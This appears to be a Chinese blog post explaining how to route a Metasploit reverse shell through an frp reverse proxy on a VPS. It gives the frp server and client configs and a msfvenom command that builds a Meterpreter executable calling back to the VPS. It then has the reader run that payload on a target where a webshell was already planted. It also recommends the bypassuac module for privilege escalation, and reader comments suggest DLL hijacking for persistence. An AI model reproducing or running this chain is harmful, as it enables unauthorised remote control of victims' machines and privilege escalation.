frp反向代理+MSF获取shell

0x00:简介

    frp 是一个反向代理工具.可以轻松地进行内网穿透.对外网提供服务,frp支持 tcp协议, http协议, https 等协议类型,并且 web 服务支持根据域名进行路由转发.

0x01:环境交代

靶机:x.x.174.171(下面简称靶机)

kali:192.168.1.106(下面简称kali)

vps:x.x.193.94(下面简称vps)

    已在靶机中获取到webshell

0x02:开始反向

一、在vps中在下载frp并编辑frps.ini

vim frps.ini
#frp服务端与客户端连接端口,frps和frpc必须一致bind_port = 7000

启动frps:./frps -c ./frps.ini

二、在kali中在下载frp并编辑frpc.ini

vim frpc.ini
[common]server_addr = x.x.193.94server_port = 7000        #frpc工作端口,必须和上面frps保持一致[msf]type = tcplocal_ip = 127.0.0.1local_port = 5555          #转发给本机的5555remote_port = 6000         #服务端用6000端口转发给本机

 启动frpc:./frpc -c ./frpc.ini

 

这里frp反向代理做完了,下面开始MSF马制作与设置监听.

三、MSF制作马

msfvenom -p windows/meterpreter/reverse_tcp lhost=x.x.193.94 lport=6000 -f exe x>i.exe

这里注意一下:

lport的端口是你frpc.ini里面的remote_port = 6000端口

四、设置监听、执行msf马

这里注意一下:

set lhost 127.0.0.1   #设置监听ip,必须和frpc中的local_ip 一致set lport 5555        #设置监听端口,与frpc中的local_port一致

到靶机去执行i.exe

观察vps上的frp

观察本地的kali

已获取到shell

tips:内置模块Local Exploit Suggester.这个模块可以帮助我们识别系统存在哪些漏洞可以被利用,并且为我们提供最合适的exp,通过这个exp我们可以进一步提权.

本人最常用的bypassuac模块

exploit/windows/local/bypassuac
洛米唯熊 发起了一个读者讨论 大佬们,你们提权是常用哪个模块呢? 精选讨论内容
Leon

啊d模块

作者

kali 里面的阿D最好用

Aa.Kay

我用cs的 dll马

作者

dll劫持 维持权限,可以可以

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容